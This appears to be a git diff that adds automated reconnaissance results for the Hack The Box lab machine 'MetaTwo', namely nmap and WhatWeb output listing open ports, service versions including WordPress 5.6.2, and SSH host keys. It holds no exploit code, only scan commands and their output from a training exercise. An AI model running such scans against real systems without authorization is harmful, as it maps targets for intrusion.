+80/tcp open  http    syn-ack nginx 1.18.0
+| http-vhosts: 
+|_128 names had status 302
+|_http-csrf: Couldn't find any CSRF vulnerabilities.
+| http-sitemap-generator: 
+|   Directory structure:
+|   Longest directory structure:
+|     Depth: 0
+|     Dir: /
+|   Total files found (by extension):
+|_    
+|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
+|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
+|_http-fetch: Please enter the complete path of the directory to save data in.
+|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
+|_http-chrono: Request times for /; avg: 215.68ms; min: 203.92ms; max: 255.33ms
+|_http-server-header: nginx/1.18.0
+|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
+|_http-dombased-xss: Couldn't find any DOM based XSS.
+|_http-mobileversion-checker: No mobile version detected.
+| http-methods: 
+|_  Supported Methods: GET HEAD POST OPTIONS
+|_http-title: Did not follow redirect to http://metapress.htb/
+|_http-errors: Couldn't find any error pages.
+|_http-jsonp-detection: Couldn't find any JSONP endpoints.
+|_http-comments-displayer: Couldn't find any comments.
+|_http-feed: Couldn't find any feeds.
+| http-headers: 
+|   Server: nginx/1.18.0
+|   Date: Wed, 25 Jan 2023 16:18:51 GMT
+|   Content-Type: text/html
+|   Content-Length: 145
+|   Connection: close
+|   Location: http://metapress.htb/
+|   
+|_  (Request type: GET)
+|_http-config-backup: ERROR: Script execution failed (use -d to debug)
+|_http-referer-checker: Couldn't find any cross-domain scripts.
+|_http-date: Wed, 25 Jan 2023 16:18:48 GMT; +2s from local time.
+|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
+| http-useragent-tester: 
+|   Status for browser useragent: 200
+|   Redirected To: http://metapress.htb/
+|   Allowed User Agents: 
+|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
+|     libwww
+|     lwp-trivial
+|     libcurl-agent/1.0
+|     PHP/
+|     Python-urllib/2.5
+|     GT::WWW
+|     Snoopy
+|     MFC_Tear_Sample
+|     HTTP::Lite
+|     PHPCrawl
+|     URI::Fetch
+|     Zend_Http_Client
+|     http client
+|     PECL::HTTP
+|     Wget/1.13.4 (linux-gnu)
+|_    WWW-Mechanize/1.34
+| http-security-headers: 
+|   Cache_Control: 
+|     Header: Cache-Control: no-store, no-cache, must-revalidate
+|   Pragma: 
+|     Header: Pragma: no-cache
+|   Expires: 
+|_    Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT
+|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Wed Jan 25 11:20:01 2023 -- 1 IP address (1 host up) scanned in 81.17 seconds
--- a/HTB/metatwo/results/scans/tcp80/tcp_80_http_screenshot.png
+++ b/HTB/metatwo/results/scans/tcp80/tcp_80_http_screenshot.png
--- a/HTB/metatwo/results/scans/tcp80/tcp_80_http_whatweb.txt
+++ b/HTB/metatwo/results/scans/tcp80/tcp_80_http_whatweb.txt
@@ -0,0 +1,138 @@
+WhatWeb report for http://10.10.11.186:80
+Status    : 302 Found
+Title     : 302 Found
+IP        : 10.10.11.186
+Country   : RESERVED, ZZ
+
+Summary   : HTTPServer[nginx/1.18.0], nginx[1.18.0], RedirectLocation[http://metapress.htb/]
+
+Detected Plugins:
+[ HTTPServer ]
+	HTTP server header string. This plugin also attempts to
+	identify the operating system from the server header.
+
+	String       : nginx/1.18.0 (from server string)
+
+[ RedirectLocation ]
+	HTTP Server string location. used with http-status 301 and
+	302
+
+	String       : http://metapress.htb/ (from location)
+
+[ nginx ]
+	Nginx (Engine-X) is a free, open-source, high-performance
+	HTTP server and reverse proxy, as well as an IMAP/POP3
+	proxy server.
+
+	Version      : 1.18.0
+	Website     : http://nginx.net/
+
+HTTP Headers:
+	HTTP/1.1 302 Moved Temporarily
+	Server: nginx/1.18.0
+	Date: Wed, 25 Jan 2023 16:18:42 GMT
+	Content-Type: text/html
+	Content-Length: 145
+	Connection: close
+	Location: http://metapress.htb/
+
+WhatWeb report for http://metapress.htb/
+Status    : 200 OK
+Title     : MetaPress &#8211; Official company site
+IP        : 10.10.11.186
+Country   : RESERVED, ZZ
+
+Summary   : Cookies[PHPSESSID], HTML5, HTTPServer[nginx/1.18.0], MetaGenerator[WordPress 5.6.2], nginx[1.18.0], PHP[8.0.24], PoweredBy[--], Script, UncommonHeaders[link], WordPress[5.6.2], X-Powered-By[PHP/8.0.24]
+
+Detected Plugins:
+[ Cookies ]
+	Display the names of cookies in the HTTP headers. The
+	values are not returned to save on space.
+
+	String       : PHPSESSID
+
+[ HTML5 ]
+	HTML version 5, detected by the doctype declaration
+
+
+[ HTTPServer ]
+	HTTP server header string. This plugin also attempts to
+	identify the operating system from the server header.
+
+	String       : nginx/1.18.0 (from server string)
+
+[ MetaGenerator ]
+	This plugin identifies meta generator tags and extracts its
+	value.
+
+	String       : WordPress 5.6.2
+
+[ PHP ]
+	PHP is a widely-used general-purpose scripting language
+	that is especially suited for Web development and can be
+	embedded into HTML. This plugin identifies PHP errors,
+	modules and versions and extracts the local file path and
+	username if present.
+
+	Version      : 8.0.24
+	Google Dorks: (2)
+	Website     : http://www.php.net/
+
+[ PoweredBy ]
+	This plugin identifies instances of 'Powered by x' text and
+	attempts to extract the value for x.
+
+	String       : --
+
+[ Script ]
+	This plugin detects instances of script HTML elements and
+	returns the script language/type.
+
+
+[ UncommonHeaders ]
+	Uncommon HTTP server headers. The blacklist includes all
+	the standard headers and many non standard but common ones.
+	Interesting but fairly common headers should have their own
+	plugins, eg. x-powered-by, server and x-aspnet-version.
+	Info about headers can be found at www.http-stats.com
+
+	String       : link (from headers)
+
+[ WordPress ]
+	WordPress is an opensource blogging system commonly used as
+	a CMS.
+
+	Version      : 5.6.2
+	Aggressive function available (check plugin file or details).
+	Google Dorks: (1)
+	Website     : http://www.wordpress.org/
+
+[ X-Powered-By ]
+	X-Powered-By HTTP header
+
+	String       : PHP/8.0.24 (from x-powered-by string)
+
+[ nginx ]
+	Nginx (Engine-X) is a free, open-source, high-performance
+	HTTP server and reverse proxy, as well as an IMAP/POP3
+	proxy server.
+
+	Version      : 1.18.0
+	Website     : http://nginx.net/
+
+HTTP Headers:
+	HTTP/1.1 200 OK
+	Server: nginx/1.18.0
+	Date: Wed, 25 Jan 2023 16:18:42 GMT
+	Content-Type: text/html; charset=UTF-8
+	Transfer-Encoding: chunked
+	Connection: close
+	X-Powered-By: PHP/8.0.24
+	Set-Cookie: PHPSESSID=2ov58ptej4gtfom05meggtjkus; path=/
+	Expires: Thu, 19 Nov 1981 08:52:00 GMT
+	Cache-Control: no-store, no-cache, must-revalidate
+	Pragma: no-cache
+	Link: <http://metapress.htb/wp-json/>; rel="https://api.w.org/"
+	Content-Encoding: gzip
+
+
--- a/HTB/metatwo/results/scans/tcp80/xml/tcp_80_http_nmap.xml
+++ b/HTB/metatwo/results/scans/tcp80/xml/tcp_80_http_nmap.xml
@@ -0,0 +1,85 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Wed Jan 25 11:18:39 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.186 -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.186" start="1674663519" startstr="Wed Jan 25 11:18:39 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="1" services="80"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1674663520"/>
+<taskend task="NSE" time="1674663520"/>
+<taskbegin task="NSE" time="1674663520"/>
+<taskend task="NSE" time="1674663520"/>
+<taskbegin task="NSE" time="1674663520"/>
+<taskend task="NSE" time="1674663520"/>
+<taskbegin task="Connect Scan" time="1674663520"/>
+<taskend task="Connect Scan" time="1674663520" extrainfo="1 total ports"/>
+<taskbegin task="Service scan" time="1674663520"/>
+<taskend task="Service scan" time="1674663526" extrainfo="1 service on 1 host"/>
+<taskbegin task="NSE" time="1674663526"/>
+<taskprogress task="NSE" time="1674663557" percent="99.67" remaining="1" etc="1674663557"/>
+<taskprogress task="NSE" time="1674663587" percent="99.67" remaining="1" etc="1674663587"/>
+<taskend task="NSE" time="1674663600"/>
+<taskbegin task="NSE" time="1674663600"/>
+<taskend task="NSE" time="1674663601"/>
+<taskbegin task="NSE" time="1674663601"/>
+<taskend task="NSE" time="1674663601"/>
+<host starttime="1674663520" endtime="1674663601"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.10.11.186" addrtype="ipv4"/>
+<hostnames>
+<hostname name="metatwo.htb" type="PTR"/>
+</hostnames>
+<ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="nginx" version="1.18.0" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.18.0</cpe></service><script id="http-vhosts" output="&#xa;128 names had status 302"/><script id="http-csrf" output="Couldn&apos;t find any CSRF vulnerabilities."/><script id="http-sitemap-generator" output="&#xa;  Directory structure:&#xa;  Longest directory structure:&#xa;    Depth: 0&#xa;    Dir: /&#xa;  Total files found (by extension):&#xa;    &#xa;"/><script id="http-wordpress-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args search-limit=&lt;number|all&gt; for deeper analysis)"/><script id="http-devframework" output="Couldn&apos;t determine the underlying framework or CMS. Try increasing &apos;httpspider.maxpagecount&apos; value to spider more pages."/><script id="http-fetch" output="Please enter the complete path of the directory to save data in."><elem key="ERROR">Please enter the complete path of the directory to save data in.</elem>
+</script><script id="http-drupal-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args number=&lt;number|all&gt; for deeper analysis)"/><script id="http-chrono" output="Request times for /; avg: 215.68ms; min: 203.92ms; max: 255.33ms"/><script id="http-server-header" output="nginx/1.18.0"><elem>nginx/1.18.0</elem>
+</script><script id="http-stored-xss" output="Couldn&apos;t find any stored XSS vulnerabilities."/><script id="http-dombased-xss" output="Couldn&apos;t find any DOM based XSS."/><script id="http-mobileversion-checker" output="No mobile version detected."/><script id="http-methods" output="&#xa;  Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
+<elem>GET</elem>
+<elem>HEAD</elem>
+<elem>POST</elem>
+<elem>OPTIONS</elem>
+</table>
+</script><script id="http-title" output="Did not follow redirect to http://metapress.htb/"><elem key="redirect_url">http://metapress.htb/</elem>
+</script><script id="http-errors" output="Couldn&apos;t find any error pages."/><script id="http-jsonp-detection" output="Couldn&apos;t find any JSONP endpoints."/><script id="http-comments-displayer" output="Couldn&apos;t find any comments."/><script id="http-feed" output="Couldn&apos;t find any feeds."/><script id="http-headers" output="&#xa;  Server: nginx/1.18.0&#xa;  Date: Wed, 25 Jan 2023 16:18:51 GMT&#xa;  Content-Type: text/html&#xa;  Content-Length: 145&#xa;  Connection: close&#xa;  Location: http://metapress.htb/&#xa;  &#xa;  (Request type: GET)&#xa;"/><script id="http-config-backup" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-referer-checker" output="Couldn&apos;t find any cross-domain scripts."/><script id="http-date" output="Wed, 25 Jan 2023 16:18:48 GMT; +2s from local time."><elem key="date">2023-01-25T16:18:48+00:00</elem>
+<elem key="delta">2.0</elem>
+</script><script id="http-wordpress-users" output="[Error] Wordpress installation was not found. We couldn&apos;t find wp-login.php"/><script id="http-useragent-tester" output="&#xa;  Status for browser useragent: 200&#xa;  Redirected To: http://metapress.htb/&#xa;  Allowed User Agents: &#xa;    Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&#xa;    libwww&#xa;    lwp-trivial&#xa;    libcurl-agent/1.0&#xa;    PHP/&#xa;    Python-urllib/2.5&#xa;    GT::WWW&#xa;    Snoopy&#xa;    MFC_Tear_Sample&#xa;    HTTP::Lite&#xa;    PHPCrawl&#xa;    URI::Fetch&#xa;    Zend_Http_Client&#xa;    http client&#xa;    PECL::HTTP&#xa;    Wget/1.13.4 (linux-gnu)&#xa;    WWW-Mechanize/1.34"><elem key="Status for browser useragent">200</elem>
+<elem key="Redirected To">http://metapress.htb/</elem>
+<table key="Allowed User Agents">
+<elem>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</elem>
+<elem>libwww</elem>
+<elem>lwp-trivial</elem>
+<elem>libcurl-agent/1.0</elem>
+<elem>PHP/</elem>
+<elem>Python-urllib/2.5</elem>
+<elem>GT::WWW</elem>
+<elem>Snoopy</elem>
+<elem>MFC_Tear_Sample</elem>
+<elem>HTTP::Lite</elem>
+<elem>PHPCrawl</elem>
+<elem>URI::Fetch</elem>
+<elem>Zend_Http_Client</elem>
+<elem>http client</elem>
+<elem>PECL::HTTP</elem>
+<elem>Wget/1.13.4 (linux-gnu)</elem>
+<elem>WWW-Mechanize/1.34</elem>
+</table>
+</script><script id="http-security-headers" output="&#xa;  Cache_Control: &#xa;    Header: Cache-Control: no-store, no-cache, must-revalidate&#xa;  Pragma: &#xa;    Header: Pragma: no-cache&#xa;  Expires: &#xa;    Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT"><table key="Cache_Control">
+<elem>Header: Cache-Control: no-store, no-cache, must-revalidate</elem>
+</table>
+<table key="Pragma">
+<elem>Header: Pragma: no-cache</elem>
+</table>
+<table key="Expires">
+<elem>Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT</elem>
+</table>
+</script><script id="http-litespeed-sourcecode-download" output="Request with null byte did not work. This web server might not be vulnerable"/></port>
+</ports>
+<times srtt="28483" rttvar="28483" to="142415"/>
+</host>
+<taskbegin task="NSE" time="1674663601"/>
+<taskend task="NSE" time="1674663601"/>
+<taskbegin task="NSE" time="1674663601"/>
+<taskend task="NSE" time="1674663601"/>
+<taskbegin task="NSE" time="1674663601"/>
+<taskend task="NSE" time="1674663601"/>
+<runstats><finished time="1674663601" timestr="Wed Jan 25 11:20:01 2023" summary="Nmap done at Wed Jan 25 11:20:01 2023; 1 IP address (1 host up) scanned in 81.17 seconds" elapsed="81.17" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>
--- a/HTB/metatwo/results/scans/xml/_full_tcp_nmap.xml
+++ b/HTB/metatwo/results/scans/xml/_full_tcp_nmap.xml
@@ -0,0 +1,75 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Wed Jan 25 11:09:20 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/xml/_full_tcp_nmap.xml 10.10.11.186 -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/xml/_full_tcp_nmap.xml 10.10.11.186" start="1674662960" startstr="Wed Jan 25 11:09:20 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="65535" services="1-65535"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1674662960"/>
+<taskend task="NSE" time="1674662960"/>
+<taskbegin task="NSE" time="1674662960"/>
+<taskend task="NSE" time="1674662960"/>
+<taskbegin task="NSE" time="1674662960"/>
+<taskend task="NSE" time="1674662960"/>
+<taskbegin task="Connect Scan" time="1674662960"/>
+<taskend task="Connect Scan" time="1674662968" extrainfo="65535 total ports"/>
+<taskbegin task="Service scan" time="1674662968"/>
+<taskend task="Service scan" time="1674663487" extrainfo="3 services on 1 host"/>
+<taskbegin task="NSE" time="1674663487"/>
+<taskend task="NSE" time="1674663497"/>
+<taskbegin task="NSE" time="1674663497"/>
+<taskend task="NSE" time="1674663525"/>
+<taskbegin task="NSE" time="1674663525"/>
+<taskend task="NSE" time="1674663525"/>
+<host starttime="1674662960" endtime="1674663525"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.10.11.186" addrtype="ipv4"/>
+<hostnames>
+<hostname name="metatwo.htb" type="PTR"/>
+</hostnames>
+<ports><extraports state="closed" count="65532">
+<extrareasons reason="conn-refused" count="65532" proto="tcp" ports="1-20,23-79,81-65535"/>
+</extraports>
+<port protocol="tcp" portid="21"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ftp" servicefp="SF-Port21-TCP:V=7.93%I=9%D=1/25%Time=63D15443%P=x86_64-pc-linux-gnu%r(GenericLines,8F,&quot;220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n&quot;)%r(Verifier,33,&quot;220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\.11\.186\]\r\n&quot;);" method="probed" conf="10"/><script id="fingerprint-strings" output="&#xa;  GenericLines: &#xa;    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]&#xa;    Invalid command: try being more creative&#xa;    Invalid command: try being more creative&#xa;  Verifier: &#xa;    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]"><elem key="GenericLines">&#xa;    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]&#xa;    Invalid command: try being more creative&#xa;    Invalid command: try being more creative</elem>
+<elem key="Verifier">&#xa;    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]</elem>
+</script></port>
+<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.4p1 Debian 5+deb11u1" extrainfo="protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.4p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa;  3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=&#xa;  256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=&#xa;  256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2"><table>
+<elem key="fingerprint">c4b44617d2102d8fec1dc927fecd79ee</elem>
+<elem key="type">ssh-rsa</elem>
+<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=</elem>
+<elem key="bits">3072</elem>
+</table>
+<table>
+<elem key="fingerprint">2aea2fcb23e8c529409cab866dcd4411</elem>
+<elem key="type">ecdsa-sha2-nistp256</elem>
+<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=</elem>
+<elem key="bits">256</elem>
+</table>
+<table>
+<elem key="fingerprint">fd78c0b0e22016fa050debd83f12a4ab</elem>
+<elem key="type">ssh-ed25519</elem>
+<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2</elem>
+<elem key="bits">256</elem>
+</table>
+</script></port>
+<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="nginx" version="1.18.0" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.18.0</cpe></service><script id="http-title" output="Did not follow redirect to http://metapress.htb/"><elem key="redirect_url">http://metapress.htb/</elem>
+</script><script id="http-methods" output="&#xa;  Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
+<elem>GET</elem>
+<elem>HEAD</elem>
+<elem>POST</elem>
+<elem>OPTIONS</elem>
+</table>
+</script><script id="http-server-header" output="nginx/1.18.0"><elem>nginx/1.18.0</elem>
+</script></port>
+</ports>
+<times srtt="37276" rttvar="3872" to="100000"/>
+</host>
+<taskbegin task="NSE" time="1674663525"/>
+<taskend task="NSE" time="1674663525"/>
+<taskbegin task="NSE" time="1674663525"/>
+<taskend task="NSE" time="1674663525"/>
+<taskbegin task="NSE" time="1674663525"/>
+<taskend task="NSE" time="1674663525"/>
+<runstats><finished time="1674663526" timestr="Wed Jan 25 11:18:46 2023" summary="Nmap done at Wed Jan 25 11:18:46 2023; 1 IP address (1 host up) scanned in 565.53 seconds" elapsed="565.53" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>
--- a/HTB/metatwo/results/scans/xml/_quick_tcp_nmap.xml
+++ b/HTB/metatwo/results/scans/xml/_quick_tcp_nmap.xml
@@ -0,0 +1,75 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Wed Jan 25 11:09:20 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.186 -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.186" start="1674662960" startstr="Wed Jan 25 11:09:20 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1674662960"/>
+<taskend task="NSE" time="1674662960"/>
+<taskbegin task="NSE" time="1674662960"/>
+<taskend task="NSE" time="1674662960"/>
+<taskbegin task="NSE" time="1674662960"/>
+<taskend task="NSE" time="1674662960"/>
+<taskbegin task="Connect Scan" time="1674662960"/>
